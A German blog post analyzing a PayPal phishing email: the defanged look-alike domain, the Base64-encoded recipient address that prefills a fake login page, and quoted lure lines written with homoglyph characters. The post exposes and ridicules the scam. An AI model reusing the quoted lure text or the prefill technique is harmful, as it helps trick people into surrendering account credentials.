Der Link führt natürlich nicht zu paypal (punkt) de, sondern auf die Domain 6qt3p6kz (punkt) pe43 (punkt) com, die gleich weniger vertrauenswürdig aussieht. In der URI ist die Base64-codierte Mailadresse des Empfängers enthalten, damit die Spammer auch wissen, dass die Mail ankommt – und um diese Mailadresse in der nach einer Weiterleitung erscheinenden, „liebevoll“ nachgebauten PayPal-Loginseite einzutragen¹:

Screenshot der PayPal-Phishingseite mit der eingetragenen Mailadresse

Natürlich habe ich mir für meinen Test erlaubt, eine andere Mailadresse anzuhängen².

So braucht man nur noch sein Passwort einzugeben und auf „Einloggen“ klicken, um den Verbrechern vollen Zugriff aufs PayPal-Konto zu gewähren.

Aber warum, zum Henker, warum sollte man das tun?

Wаrum ist mein Kontozugriff eingeschränkt?

Ihr Kontozugriff wurde аus dem folgenden Grund eingeschränkt:
Wir möchten überрrüfen, dаß sich niemаnd ohne Ihre Erlаubnis Zugriff zu Ihrem Konto verschаft hаt.

Ach so, deshalb. :mrgreen:

Coрyright © 1999-2013. аlle Rechte vorbehаlten.

Eine Spam (oder auch jede gewerbliche E-Mail), die deklariert, dass sie irgendjemandes „geistiges Eigentum“ ist, wirkt gleich mindestens eine Größenordnung lächerlicher – oder wird so ein Hinweis neuerdings auch unter jeden Brief, jeden Kontoauszug, jede Reklame gestempelt?

¹Grundsätzlich ist von jedem Klick in eine Spam abzuraten, denn die Seiten der Kriminellen sind immer gefährlich. Den Screenshot habe ich mit einem Browser in einer virtuellen Maschine gemacht. Eine alternative und sehr sichere Möglichkeit ist die Verwendung eines Webdienstes zum Anfertigen von Screenshots – wer neugierig ist, kann sich damit leicht einen Eindruck verschaffen, ohne dass Kriminelle im Browser rummachen können.

²Wer noch nicht weiß, wie das geht: man 1 base64